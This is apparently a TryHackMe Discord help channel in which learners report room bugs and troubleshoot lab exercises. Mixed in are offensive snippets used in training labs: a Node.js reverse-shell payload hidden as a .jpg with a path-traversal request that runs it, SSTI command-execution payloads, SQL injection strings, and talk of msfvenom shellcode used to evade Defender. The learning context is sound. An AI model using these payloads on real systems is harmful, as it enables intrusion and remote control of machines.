^C64 bytes from 10.200.60.201: icmp_seq=1 ttl=127 time=79.3 ms
βββ(rootγΏkali)-[~]
ββ# ping thmserver2.za.tryhackme.loc
PING thmserver2.za.tryhackme.loc (10.200.60.202) 56(84) bytes of data.
^C64 bytes from 10.200.60.202: icmp_seq=1 ttl=127 time=79.7 ms
βββ(rootγΏkali)-[~]
ββ# ping distributor.za.tryhackme.loc
PING distributor.za.tryhackme.loc (10.200.60.201) 56(84) bytes of data.
^C64 bytes from 10.200.60.201: icmp_seq=1 ttl=127 time=83.5 ms
Apologies, I am new to all of this. Don't I need the interceptor on for the task?
No you can view request history by clicking on HTTP history tab next to Intercept tab π .
Wow, lol, sorry about that! Thank you!
Gave +1 Rep to @spare mirage (current: #7 - 921)
Reported in the room-help already, #room-help message
In room https://tryhackme.com/r/room/weaponizingvulnerabilities
sqlmap is not installed on the AttackBox, contrary to the room instructions.
When I install the sqlmap, the interface is now different and tool asks more questions during scan. It doesn't look like the instructions from Task 6.
The exploit no longer works, it's impossible to complete the Task 6.
If the version of the DB is the same, it's possible code to CHATAI is now changed and no longer vulnerable, or the version of PHP is different and no longer vulnerable. Apache seems to be the same version as in the task.
Or perhaps version of MariaDB is different
yo
im on AOC
and when i start a machine it says i already started one
although i cant find any machine sessions anywhere
Anything here?
https://tryhackme.com/api/vm/running
Scoll to the top of the screen.
The AttackBox got an update and sqlmap was missed in the update. It will be fixed shortly, apologies for this.
I also tested that room and it worked as expected for me as per the room text."sudo apt install sqlmap" and followed the instructions per the room text of "(Note: Enter Y if prompted and 4 to specify PHP as the supported language of the web server):"
I'll try again.
What is the version of sqlmap that you have? When I did apt update && apt install sqlmap I get the version 1.4.4. When I run the sqlmap I get this message:
root@ip-10-10-96-125:~# sqlmap -version
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
Usage: python3 sqlmap [options]
sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic and -hh for advanced help
[13:28:35] [WARNING] you haven't updated sqlmap for more than 1708 days!!!
The not updated for 1708 days is a bit worrying
It worked !!! Thanks @wraith obsidian
Gave +1 Rep to @wraith obsidian (current: #831 - 5)
Great! Hmm, there is probably a stale package in the ubuntu repository but it shouldn't affect the room.
π
there was nothing
i had to let the invisible machine time finish until i could start it agaom
The last image in task 6 seems to be broken, within the Intro to Docker room:
https://tryhackme.com/r/room/introtodockerk8pdqk
Thanks for reporting. Will get it looked it.
Gave +1 Rep to @tall flint (current: #1207 - 3)
Room: https://tryhackme.com/r/room/threatmodelling
Task 1: Introduction
Under prerequisites it still says Intro to Threat Emulation (coming soon!) instead of being linked to https://tryhackme.com/r/room/threatemulationintro
I am trying to complete "OWASP Top 10 - 2021" learning path and in " Task 22
Server-Side Request Forgery (SSRF)", it's unable to upload found flag(thm{c4ni_haz...._......), displayed one not recognized by THM platform.π€
"If you want to [missing word] more about sandboxes, have a look at the room FlareVM: Arsenal of Tools."
Hi everyone (pls excuse mistypings as my keyboard is rather ...effed rn)
I am doing the room "Web Enumeration" Task 6.
I have run gobuster with this exact command:
gobuster vhost -u http://webenum.thm -w subdomains-top1million-5000.txt -t 99
What I get in my terminal (zsh on macOS) is a lot of 400's :
see img.
I searched for a writeup, and a similar command (minus the -t 99 flag, which I also ran, not that it should chagne anything according to my current understandin) should turn up ... well spolier, not sure I should post it (not clear on the rules with that, but I did use the procided soln and the site accepted the answer).
My first question is if this is a room bug?
If not, I'm happy to learn what I'm not understanding and doing wrong.
But if it is a room bug, I'm not sure what I should propose as a suggestion for a fix.
thoughts?
I should note, the url is in my /etc/hosts file.
And to be clear, the answer to the question did not appear in the results of the scan.
I only got a bunch of 400's
π Small typo in https://tryhackme.com/r/room/opsec Task 3: pause a threat -> pose a threat
Also, seems like a bug in AoC24 - Task 8/Day2 - Question #2:
The only way to get the correct # of failed attempts is to use the exact window from the video - there were actually a pile of other failed attempts prior to the 29-Nov 00:00 start-time.
Consider (updating the hint?) or adding a note to clarify the time-window requirement π
https://tryhackme.com/r/room/adventofcyber2024
in the room "common attacks", in the phishing section this email has no misspelling in the domain name
https://tryhackme.com/r/room/commonattacks
I think there is something written about it in the task but (I think) I too got stuck there too and I am for adding a mention for timeframe in the hint
I need help please
I've been getting error 504 on running task 2 that's the elastic SIEM tool and it's been giving me the same error message for the past 3days now
Advent of cyber day 2
Hello good day here, please is anyone here among the Lazarus group?
whoa thanks you, I was trying various filer for the past 15 minutes π
Gave +1 Rep to @misty gull (current: #194 - 37)
Quick note for https://tryhackme.com/r/room/networkingsecureprotocols Task 8:
First, after right-clicking anywhere, choose βProtocol Preferences.β From the submenu, select βTransport Layer Security.β Thirdly, click on βOpen Transport Layer Security preferences.β
right-clicking anywhere is not effective. "Transport Layer Security" will only appear as an option if you rc on a packet that actually used TLS in the first place.
it works now that I'm doing it in chrome
Glad to hear that , enjoy the room buddy π
I am getting an error when opening the VM associated with today's Advent challenge. When I start the VM I get an error that says "An error has occured and this action cannot be completed. If the problem persists, please notify your system administrator or check your system logs". Any idea what could be causing this? I have cleared out all cache and history in my browser to troubleshoot with no luck.
Terminate the machine and start a new one π
I have done that a few time too, but I will try it again. TY
I am facing an issue with the attack machine suddenly got disconnected, and when i asked echo it looks like there is an issue also in understanding my statement
Me: the attack machine suddenly disconnected what shall i do ?.
Echo: For the next tasks, you'll need to tackle without me! You got this! To keep interacting with me, please check any room in the Jr Penetration Tester Path.
Me: the attack machine suddenly disconnected
Echo: For the next tasks, you'll need to tackle without me! You got this! To keep interacting with me, please check any room in the Jr Penetration Tester Path.
Me: i am not able to connect to the attach machine
Echo: For the next tasks, you'll need to tackle without me! You got this! To keep interacting with me, please check any room in the Jr Penetration Tester Path.
Echo won't give you advice or help on the Attackbox ending.
Noted π
BUG: room/containervulnerabilitiesDG
Task 6 has incorrect text:
Generally speaking, a Docker container will have very processes running. This is because a container is designed to do one task. I.e., just run a web server, or a database.
It should be:
Generally speaking, a Docker container will have very few processes running. This is because a container is designed to do one task. I.e., just run a web server, or a database.
I'm working on the room Fowsniff CTE right now and are these pastebin links supposed to be inaccessible?
it says pastebin took them down recently
I think it's making the room uncompletable but I might be missing something
one of the pages says it was taken down Aug 2024 so i thought maybe it has flown under the radar for 2 months
There is a massive problem in today's Advent of Cyber task that Microsoft Defender blocks the execution of the shellscript!
Oh ok, you really have to copy the powershell script parts in three parts not in one go! Then it works
Lmfao. Right, okay, who forgot to disable Defender 
I was having the same problem, I was jumping the gun and had the payload using port 1111, I also made an oppsie and had the ip of the windows machine not my attack box in msfvenom setup. Make sure when you create the msfvenom payload you use your attack box ip and the port 4444, listen on port 4444 on your attack box . Then the last part put each in line in separately and hit enter. It then worked for me.
defender got smart
That's the whole point of task to bypass defender π
Copy last 4 lines of exploit - line by line
Also make sure you're using port 4444 π
Check out this Wayback link π
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
Did you do anything to the third line in the single line section? Defender kills my powershell terminal anytime I hit enter on that line
I also triple checked that I am using the Attackbox IP and port 4444, so I am hoping it is not that
Ok, I just restarted everything, did something for an hour, and it works now
Maybe you forgot to update your shellcode?
Maybe but Iβm pretty sure the way I transferred it caused an issue. The clipboard wasnβt showing up on the Windows VM and Ctrl-Shift-C didnβt seem to work, so I did the logical thing.
- Double encoded shell code in Base64
- Pasted code blocks and encoded shellcode into different files.
- Hosted files with http.server
- Accessed files on Windows machine
- Decoded shellcode
- Pasted shellcode into search bar to remove unwanted characters.
- Attempted to run code as intended from there
When it worked, I RDPed in with the AttackBox and just pasted everything normally
Like a hooligan
I also may be slightly delirious right now lol
I want to become a hacker, what should I do?
Hey guys ! I'm creating my own room for a workshop at school ! I create my VM on virtualbox and export it in .ova to deploy it on Tryhackme but it is unreachable, I ping it, try to connect in ssh, nmap it... nothing on the ip given by the site when I start the machine ? Can somenone help me ? is there a special configuration for tryhackme ?
Try to ask here https://discord.com/channels/521382216299839518/521771811768107008 π
oh thanks, didn't see this channel π
Gave +1 Rep to @spare mirage (current: #7 - 1052)
Nope I didn't change anything in the final lines, it died in the third line for me too before I made the fixes to my payload with the proper ip and port
Hi, could someone please confirm if this is a bug? And the way around!
Room - Windows Incident Surface
Issue - Task 3 Target machine is not accessible- 'WIN-Insident-Surface_v1.5A'
- The machine starts but the window doesn't split
- Can't access through ssh ( baseline says ssh is disabled)
- Cleared browser cache but no luck.
Thanks..
Enabled on purpose. π
Room - Unified Kill Chain. Weaponization has been changed to Resource Development in the current version of the Unified Kill Chain.
Hello
I would like to point out that the Bandit room was down yesterday, the vulnerable web server not accessible and then the powershell configuration file not present.
DAY 3: my firefox browser in the attackbox is saying 'unable to connect' when i paste the beginning URL 'http://10.10.30.101:5601/' - Can someone please help??
DAY 3: I searched for the available clientip values and only saw ::1, 10.9.98.230 and 10.13.27.115
it was only until I looked at the screenshots that I found a hit with the correct clientiip
Don't use screenshots from Task , they are there for example purposes π
I understand I'm not supposed to, but When I put no filters, oct 1 0:00 to oct 2 0:00 and tried to go through the clientips through the attackbox the ip value that I was supposed to find didn't appear, both before and after searching for the shell.pup in the message column
Extend that to Oct 2nd 23:30
my attackbox ran out of time i'll try that tomorrow
In the room Caldera , when i run command python3 server.py --insecure, the terminal respond multiple issues about missing modules. even after installing the modules e.g. pip install sphinx-rtd-theme , pip install myst-parser ,etc. when i use the web browser to access http://attacker_IP:8888 . the web page displays " 500 Internal Server Error
Server got itself in trouble " 
Has anyone been able to get through GoldenEye recently? The RCE via the spell checker doesn't appear to be functioning anymore as the spell checker never loads. Also, the tabs on the left side, such as Blogs, cannot be expanded. I've had to go through the source code to grab links to access the different categories
Suggestion for MonikerLink room Task 3: update the instructions to explicitly say to replace the ATTACK_MACHINE placeholder with the appropriate IP.
When I copy pasted the PoC I started from the docstring, rather than the first line of actual code. The result is that line 12 contains "victim@monikerlink.thm" and modifying the MonikerLink in line 12 renders the email undeliverable.
If the initial docstring is included in the copy paste operation (as the included gif shows) the correct replacement is on line 17. Starting from the the first line of code (the first import) correctly places the actual MonikerLink on line 12.
That is all for your DOTD (Derp of the Day)
When I try to keep on the attack on intruder in the burpsuite intruder pratical example i make the attack and in the response all the username and password have the same length, so I canβt find the answer I need. How this is possible?
https://tryhackme.com/r/room/publickeycrypto Task 6. Does not accept the answer "LetΒ΄s encrypt". Also tried "Lets encrypt" and others. but does not work. Checked youtube and other playforms, and it should work with no issues.
Refresh the page and copy this || Let's Encrypt || , formating of ' in your example is strange π
When i try orm injection room there is no attack box button. is it normal? https://tryhackme.com/r/room/orminjection
Maybe I'm doing something totally wrong but the room Opacity seem bugged to me.
Whatever I upload, it's always a 404 response, even with valid images. Is it broken and should I stop trying? Or am I doing something wrong and do I just need to try some more?
No , it's not , start the AttackBox in some other room π
Room: Sysmon, Task 3, Starting Sysmon. Command in screenshot point to ..\Configuration\ foder. Given VM to this room don't have this folder. But there is folder with "s" at the end: ..\Configurations.
thanks π
Gave +1 Rep to @spare mirage (current: #7 - 1169)
Room: https://tryhackme.com/r/room/training
Problem: "An unknown error has occurred" when clicking on submit/complete buttons at task 3, 4 and 5
Play by play:
- Access room "Training Impact on Teams"
- Task 3 "Write a Cyber Security Training Investment Proposal"
- Q: What would be the savings due to the increased productivity?
A: 40000
click on "submit" and get "An unknown error has occurred" - Q: Assuming that training costs $500 per employee, what is the Return on Investment?
A: 400%
click on "submit" and get "An unknown error has occurred" - Task 4 "Vendor Selection"
click on "complete" and get "An unknown error has occurred" - Task 5 "Conclusion"
click on "complete" and get "An unknown error has occurred"
I'm trying to answer a question on try hack me Cybersecurity 101> search skill
" What's the netstat parameter in MS window that displays the executable associated with each active connection and listening port"
I typed netstat-b as the answer, and it kept saying wrong answer.
Use just -b
π
-b is paramater , netstat is a command
It worked
Thank you π
Gave +1 Rep to @spare mirage (current: #7 - 1186)
Room https://tryhackme.com/r/room/owasptop10 task 20 has a few links to http://www.xss-payloads.com/ which appears to have gone rogue.
it worked now π Thank you
Gave +1 Rep to @spare mirage (current: #7 - 1187)
Room https://tryhackme.com/r/room/owasptop10 task 22 (Insecure Deserialization - Objects) has some misleading statements about objects (in OO programming):
"Lamps can have different types of bulbs, this would be their state, as well as being either on/off - their behaviour!"
Followed by the question "if a dog was sleeping, would this be": A) A State, or B) A Behaviour. One could argue that a Dog.Sleep() method would be behavior, but if you're mostly flipping a boolean property then it's mostly just state. Just like the lamp being on/off.
This really comes down to the model of design.
State for the for lamp could be On/off + Which type of bulb (Normal, Energy saving)
Dog.Sleep would be a change of state unless there a sequence of actions.
One could argue that a Dog.Sleep() method would be behavior, but if you're mostly flipping a boolean property then it's mostly just state. Just like the lamp being on/off.
This just makes it look like you've fed in to AI and got the response.
I've coded in C, C++, C# since the 1990:s. I don't need AI to speak about OOP.
Is there a more appropriate place, channel or website address, for feedback on room content?
I just want to help improve the content, once in a while, when I find something that is a bit off.
If it's a bug, this channel.
So is it okay to report content errors as room bugs?
Yes.
there are 2 rooms which redirect to the same url
both of them redirect to https://tryhackme.com/r/room/nosqlinjectiontutorial
Hello, I have an issue with the Whiterose room.
Despite waiting for over 30 minutes, I can't access the site, either through AttacBox or my own machine with VPN enabled. Am I perhaps doing something wrong?
Iβm getting the following message:
Hmm. Weβre having trouble finding that site.
We canβt connect to the server at cyprusbank.thm
Have you added that domain to your /etc/hosts π ?
Yes
tryhackme's linux fundamentals 2 room has a problem in the terminal on my account. The 2nd task says to open the terminal and connect to the IP address given with the attackbox. I used ssh tryhackme@IP address but once it asks for the password it keeps saying it's wrong even though the second task says the password is tryhackme too, I could connect to it 2 days ago but now I can't. I tried to close the attackbox and restart it with a new IP but didn't work. Even tried to refresh the page and close the tab and open it again but still seems like a problem. How to fix it ?
i will check it for you
Thanks
Gave +1 Rep to @fringe pagoda (current: #670 - 7)
it worked just try password tryhackme without any quotation
try copy past and let me know
Did just like you said but still doesn't work
Oh wait. I think I found out why...
I forgot to start my target machine, used the IP of the terminal itself... I'm so dumb sorry lol
Yeah, just did it.
glad, it worked
Thanks for helping ^^
you are welcome bro
Hey. Iβm doing the enumeration and brute forcing room where there are labs that require to go to enum.thm but the server seems down
Have you added it to /etc/hosts π ?
https://tryhackme.com/r/room/unattended
Hey the VM's in this room are seriously undersize (4gb of RAM) they are refusing to launch any of the Eric Zimmerman tools. I'm trying to start Registry Explorer and it's been trying to launch it for ages. Is there a way to get the collected artefacts files easily from the VM and use it on our own ?
Thanks in advance
https://tryhackme.com/r/room/serversidetemplateinjection
I maybe wrong But I need to inform the fact that, In this room it has no well explain why we use {{"".__class__.__mro__[1].__subclasses__()[offset].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("ls")}} instead of {{"".__class__.__mro__[1].__subclasses__()[offset].('ls',stdout=-1).communicate()}} . Besides its claim offset 157 (see the picture bellow) is subprocess.Popen class offset and still use the first payload. I might be wrong but if I pass the extra .__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("ls")}} data (which I guess import subprocess) will always endup with error. So maybe the first payload will only work for "_sitebuiltins._Helper" class. Where I need to import subprocess externally. Kindly fix this info!!
--Room: Server-side template Injection
--task: 6
hi, aoc shell code vm didn't working
split screen isn't working
showing black screen
ik heb een bug gevond op de room Advent of Cyber 2024 mij cijf is van 75 naar 69
Which CTF?
Last room in the tryhackme path "VU23216 AT2 - Splunk Data Manipulation", the VM has no internet connection, other attack boxes and all other rooms seem to be fine.. but can't connect to Splunk in this room with no connection..
Note, I have restarted everything and logged back in, only to find the same issue.
Thanks,
Start machine buttons, not active in the advent, what should I do ?
is it already started? scroll to top and look for the red bar that would show your VM info
I know, It was my router it was giving me connection error, I have to replace it sometime in the future
Can someone help me here?
- I can't write the url afterwards
- If i click around and somehow get to write something and i press enter or any other key, nothing happens
Press tab to make spacing between IP and URL π
learning path: cybersecurity101
room: Moniker Link (CVE-2024-21413)
Task 3:
trying to setup a responder, keep getting errors, tried multiple times. Saw an entry for the same error in this chat search. Was wondereing when it would be fixed or am i doing something wrong.
There's a temporary problem with that room due to a recent AttackBox update , it will be resolved soon π
oh ok thank you.
@spare mirage : Is it possible, that more machines are affected by those updates? I am trying to execute Room "Metasploit: Exploitation" and try to find vulnerabilities on my target machine. But the command "exploit", according to the example, tells me, there is no vulnerability and no sessions are being created. So i also can't finalize this exercise π¦
You're probably using the wrong machine π . That room has multiple different machines . Terminate the machine from Task 2 and start the machine from Task 5 π
Ok, but would have been better if there is a note that it is necessary to switch the machines
I am working on this for 2 hours now and thought problem was on my side.
Whenever you see machine icon attached to the Task it means that different machine is used in that Task π
Ok, thanks for clarification
Hi. I have a problem with Task 2 in room: https://tryhackme.com/r/room/subdomainenumeration
crt.sh returns error when I try search for tryhackme.com domain, other domains work fine.
Works fine for me π
Free CT Log Certificate Search Tool from Sectigo (formerly Comodo CA)
O_o it started work. π
Glad to hear that π , enjoy rest of the room π
Can someone check if day 1 in https://tryhackme.com/r/room/25daysofchristmas works? I can start machine but even after 10min I can not access website.
Oh, started working after almost 20 minutes.
Thank you m8 π
Gave +1 Rep to @spare mirage (current: #7 - 1292)
Anytime buddy π
Can someone check the wreath room if it works I've been trying to join the room and for some reason it doesn't let me join
do you have a 7 day streak or are a subscriber????
No I have a 3 day streak and I'm not a subscriber
network rooms for free users require a minimum of a 7 day streak
In AOC 2024, Task 18 (Day 12) it says, "Place the mouse cursor inside the request inside the Repeater tab in Burp Suite and press Ctrl+R to duplicate the tab. Press Ctrl+R ten times to have 10 duplicate requests ready for testing."
If you press controls-r 10 times, you have 11 duplicate requests. Also, it doesn't match the screenshot.
Hey everyone! having a small issue with the CyberChef: The Basics room. There is a download file and I am unable to download it, can't figure out why. Is this a bug?
Press the + icon on the right side of 10th request to create to a group π
What's the problem π ? What happens when you press download ?
Once I click the Download Task Files, for some reason nothing at all downloads. ive checked my /downloads file on my computer and checked the chrome download section but for some reason nothing downloads π¦
Press Ctrl+J to open Chrome downloads π
Every time I start burpsuiteβs browser it continuosly remain in stand-bay without let me access to the sites
Disable Intercept π
Ok
Then when i go try to complete the burpsuite intruder challenge (the last One) i make the macro and use the wordlists provided but strangely the username and password that afford to pass the login are not there. There are others, but not those wich are correct
I know it because i checked on YouTube the correct answer
Disable encoding option in Intruder
Yes but itβs strange because when I start the attack itβs too slow. Look, the problem is not i trust that i canβt find the credenzials, is that itβs simply too slow doing its work. Maybe itβs normal. I will see as it will go and then I will revise this question. I donβt know whereβs the problem but I will find out. Thanks
Burp is very slow if you aren't using Pro version , that's done on purpose π
Ah so itβs normal! Lol, ok
Yes it is π
Room: Wazuh, Task 3, typo in text: Once you navigate to this display, the intuitive wizard will be available to you. I have shared screenshots of using the wizard to install Wazhur's agent on both Windows and Debian/Ubuntu.
Room: Wazuh, Task 5, typo in questions: "Navigate to the "Modules" tab by pressing Wazuh -> Modules and open the "Policy Management" module like so:", but the module name is "Policy Monitoring".
u need to group them dude
On AoC 2024 - Day 10, there is a potenital bug with the filename of the attachment. it won't process the attachment if there is a space in the name... "Secret Santa.docm" never connects. "SecretSanta.docm" works as expected. Room finished.. probably assumed everyone just used "invoice.docm" for the file name and I was being creative.
Did you fry using %20 ?
No i didn't.. I would never save a file with a %20 in it as an end user.. I'm just reporting that someone who is following the steps for the day, if they accidentally put a space in the filename, then the back end process which is opening the macro doc to do the connection fails. Then you wind up getting people posting on here about the reverse connection not occuring and they are told to retry.. if they don't change the filename for the attachment, it still won't work and they won't know why. so either the room docs need a clarity hint, or the back end process needs to escape the filename or something. At least, those would be my suggestions.
For some reason I am getting DC while doing Yin & Yang from sidequests
IP for yin 10.10.180.108 IP for yang 10.10.215.101
I was connected over SSH
and they simply died
earlier today I had the same problem with yang
Hi, anyone encountered issues with Telnet segemtn of Networking Concepts room?
It asks for a flag after sending HTTP request through telletm but I get back code 400
telnet 10.10.97.191 80
Trying 10.10.97.191...
Connected to 10.10.97.191.
Escape character is '^]'.
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 17 Dec 2024 17:25:14 GMT
Server: lighttpd/1.4.63
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>400 Bad Request</title>
</head>
<body>
<h1>400 Bad Request</h1>
</body>
</html>
Connection closed by foreign host.
You will need to specify Host header also , it's mandatory π
GET / HTTP/1.1
Host: telnet
Hit enter twice
mm
I'm seeing the apache default page on a few different machines right now, ones that shouldn't have the default page to my knowledge. Affected machines are overpass and the 'team' ctf
Yea, Still need a fix/adjustment.
Hello, I am trying to complete the Persisting in Active Directory and my AttackBox does not have a PersistAD interface. It may have to do with the fact I needed to re-join the room. Please advise
Room: Burp Suite: Intruder
TASK 10: INSTRUCTION NUMBER 8 - INSTEAD OF 'OK,' SHOULD CLICK 'X' BUTTON INSTEAD, IF 'OK,' NOT WORKING
Room: Upload Vulnerabilities
i do not get a reverse shell while using the attackbox on upload vulnerabilities task 11
i managed to upload the script to the server and to activate it but i still do not get the shell
I am using the attack box ip and the correct port
**Room: Defensive Security Intro **
For the virtual machine part in it when you input the ip addresses to block it doesnt work even though correct ones input. refreshed and tried many times but doesnt work
Make sure you don't have spaces after IP
Which IP are you entering ?
You need to verify first π
The TryHackMe Discord Server
oh ill just do that
tried all 3 ip's no spaces at the end
nothing working
You need to enter malicious IP from Step 1 , IPs from that list are already blocked π
thank you
Gave +1 Rep to @spare mirage (current: #5 - 1446)
For Walking an application, I am getting a 504 gateway timeout. Any ideas as to how I can get past it?
Wait for machine to fully boot up π
not exactly a bug but i believe that the hint for the last question in task 27 for the advent of cyber event is wrong
it should be uploadfiles function not downloadandexecutefiles files function
Room bug from advent of cyber task 14 Shellcodes the clipboard is awfully buggy and will reverse whatever you copy in. Also the windows vm seems quite unstable. If you need me to send some screen shots I can do so. Just want to help out to make sure if anyone else is doing this, they can finish it.
https://tryhackme.com/r/room/cauldron
App doesn't work with View Site option
yes please, send some screen shots i can't get the clipboard to work. it's frustrating.
Could i get temp access to upload a couple screenshots I toke this morning while I was trying to working on it.
If you would like to post screenshots you can do it by verifying your THM account. https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account
The TryHackMe Discord Server
Also it's recommended to use your host device's clipboard/notes to move things like the shellcode back and forth.
Were you posting those blocks individually?
And... seemingly out of order?
no that's from the clipboard on the Windows vm. the very first block. we are supposed patse in from the walkthrough
I have used both and the clipboard either flips my input or deletes it entirely. I also tried to type it in manually and got it spat back at me.
You post everything from $VrtAlloc = @" to Add-Type $CrtThread in a single command line.
Then [Byte[]] $buf = {SHELLCODE} is its own command
Then each line after individually
i'm getting the same thing
Yes, placed the first block to the vm clipboard using CTL+SHIFT+ALT it has allowed me to paste it in to the clipboard recently. Then when I grab it from the clipboard it either is not there or as seen in my screenshot it reverses from code we are supposed to patse in. And then spits out an error in my other screenshot
Oh it's the VM clipboard doing it?
Yes correct
Yeah I've heard they've been having issues with that.
The getaround if you're using a windows host machine is just to use something like notepad on your local, but not sure if you're connecting through a linux VM
what are you using to keep the string copied? just the default for kali?
Yes, also have a file on my main security laptop running parrot security and got the same issue
You might benefit from something like Obsidian for notes, but I don't know for sure if that'd fix the issue
I have been using pluma on parrot sec
What a weird problem to have, I wish I could be more useful
Have you tried copying to notepad in the windows VM first? You might be able to reorient the paste that way if it still comes out wrong
Ok, I placed my bug report here to hopefully get this fixed for others and a possible workaround for this issue.
welp i was able to somehow paste the code in correctly and get the revshell, but still no flag after a couple minutes. sigh. guess i'll come back back to this later
The big one is that the walkthrough kind of blows over is you having to create new shellcode and nc -lvnp for port 4444 specifically
So if you didn't do that, that might be why
Room: OWASP Juice Shop
Issue 1: Instructions state to manipulate | "email" "[user]" | by replacing [user] with 1=1-- or ' to cause a closed email string and default to user0 (admin). Neither command worked, so ||I had to use ' OR TRUE -- which was able to force a SQL error.||
Issue 2: The recommended method of getting the persistent XSS flag by manipulating the Headers response in Burp for the ||True-Client-IP||, but this didn't seem to return the persistent flag. Recent versions of Juice don't seem to have Persistent XSS flags at all, so this might be a version issue?
Hello. In the AOC24 room, Day 21 (Task 27), the connection card says the Attack Box is needed. This is incorrect. It is not needed, and is also no shown being used in the walkthrough video.
I completed the task.
Hi:) thanks for reporting! Iβll get this updated in the morning
Gave +1 Rep to @tame karma (current: #261 - 24)
ah right. saw that but got stuck on trying to get the code over to execute. thanks!
Gave +1 Rep to @mellow bolt (current: #336 - 17)
getting a blankscreen after the shellcodes vm boots up, tried 2x now. calling it a night, hopefully the elfs fix that one up.
https://tryhackme.com/r/room/linuxfundamentalspart1
If we wanted to output the text "TryHackMe", what would our command be?
echo "TryHackMe"doesn't workecho TryHackMeworks.
You should probably add this to the correct answers
Both works,
yes I know but the thm portal doesn't accept the first answer
it accepts only the 2nd ans.
Yeah, the room was changed slightly when symbols were breaking answers.
ohk, maybe add hint then. Ik it's ntg big but still
A couple of users have reported the bug on CALDARA room, could TryHackMe fix the problems of the room and let us know when its all fixed?
I'm seeing the same problem
curl http://jewel.uploadvulns.thm/content/FXF.jpg
function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4242, "10.6.26.175", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
POST http://jewel.uploadvulns.thm/admin?submit=failure HTTP/1.1
host: jewel.uploadvulns.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://jewel.uploadvulns.thm
Connection: keep-alive
Referer: http://jewel.uploadvulns.thm/admin?submit=failure
Upgrade-Insecure-Requests: 1
Priority: u=0, i
cmd=..%2Fcontent%2FFXF.jpg
How long is that suposed to take? Today I waited over 5 minutes, even though the instructions said to wait 2 minutes.
hey anyone knows..playing aoc someone got in the online room and starting typing ... he could play instead of me. in this kubernetes room.
@wooden mirage
Did you click on the green Start Machine button in one of the first few tasks or on the blue Start Attackbox button?
10-15min π
Hello is it normal that sometimes a running machine shutdown with no reason ? A pop up says that the machine as terminated suddenly, without additional info.
Does the staff is notified about it ?
Quite frustrating when you pay for premium access π
It's not normal, but it can happen sometimes π¦ , probably due to a congestion on THM side .
Probably, yes. I just want to say that it's quite rude to read that is for "cost savings" purpose while I'm paying a subscription. Maybe there is an improvement to make here π
I mean, I'm ready to pay my subscription few euros more if it's more sustainable for THM
The cost savings thing is on AWS side I'm sure.
Not THM's.
Maybe but you got my point. I sent a message to the support to report this problem
Room help, please: https://tryhackme.com/r/room/cicdandbuildsecurity
AttackBox doesn't see any of the machines on the Room's network. Waited ~ 20mins, have tried multiple times, including reset AttackBox. Pings timeout, ssh to mother times out, http connections time out.
Bug?
It seems the room's network is not visible from the AttackBox?
The room "ORM Injection" (Web Application Pentesting > Injection Attacks > ORM Injection) might need a "Start AttackBox" button. There was content in the room which indicated using an attack system. My workaround was to simply start an AttackBox from another location. https://tryhackme.com/r/room/orminjection
Hello everyone, room help?
Room https://tryhackme.com/r/room/winadbasics - Active directory basics requires using RDP to connect to the Windows machine.
I want to use Remmina, but upon launching the app, this pops up:
<< Why cant I upload image ... >>
You will need to verify to upload images π
The TryHackMe Discord Server
Yea, working on it π
There it is
I tried "tryhackme" and "Password123", no luck
You can ignore that , just press x π
... okay ... all that effort π
To whom this may concern, Advent 2024 - Task 29: --rules=worldlist
This command has a typo, which is further fixed further into the room.
Not a huge issue, just thought to let it be known.
Thanks for highlighting, should be fixed now.
Gave +1 Rep to @swift quiver (current: #2516 - 1)
Small markdown issue in the SOC simulator documentation π
I'm working on Task 14 (Day 8). I'm using my own computer as the attack box. I've got the reverse shell against port 4444, but no flag is appearing.
apparently, you need to connect on 1111 first, and then on 4444. I had gone straight to 4444.
It would be nicer if AoC Task #29 (Day 23) included instructions on how to pdftotext. It's supposed to be a walkthrough, after all.
Both.
I waited about 20 minutes from starting the target machine and then tried but got the same 504 gateway timeout. What should I do.
Let me take a look when I get the chance later today and let you know if its works on my end.
Press F5 to refresh the page π
Welcome to the internet. Everything is constantly being scanned at all times.
TryHackMe Attackboxes -- for some inane reason I have never quite figured out -- are exposed directly on the internet with public IP addresses (as opposed to being behind NAT).
Ergo, you'll find that your listeners get hit every so often if you bind to 0.0.0.0
If you want to avoid that, use the VPN rather than the attackbox (preferable anyway), or bind to your internal interface (whichever one has the 10.10.0.0/16 IP address)
same here for task 9 Day 3 of AoC
Hey is anyone experiencing an issue with OWASP 2021 task 20 ?
Is it working on your end or not?
I refreshed it twice and it still isn't working.
I have trouble with azure portal logging me off everytime i try to log in
On The Sticker Shop, is it supposed to give me a 401 unauthorized message?
Yes π
Mother's secret, night regime usually shouldn't use black text...
I have a problem in SYSMON room task 4- cant run to command get win event for id =3 i did like stuffy24 did. Bot working. I copied and paste and edited not working one of the two happens or its getting stuck or getting like '>>' after pressing enter.
It's in powershell
Is there any problem with the SYSMON ROOM or it's just me?
I have just skipped that but I'm feeling dumb.
So please if someone can try with task 4 Q2+Q3 and let me know if it's me or something corrupted in the machine or something else.
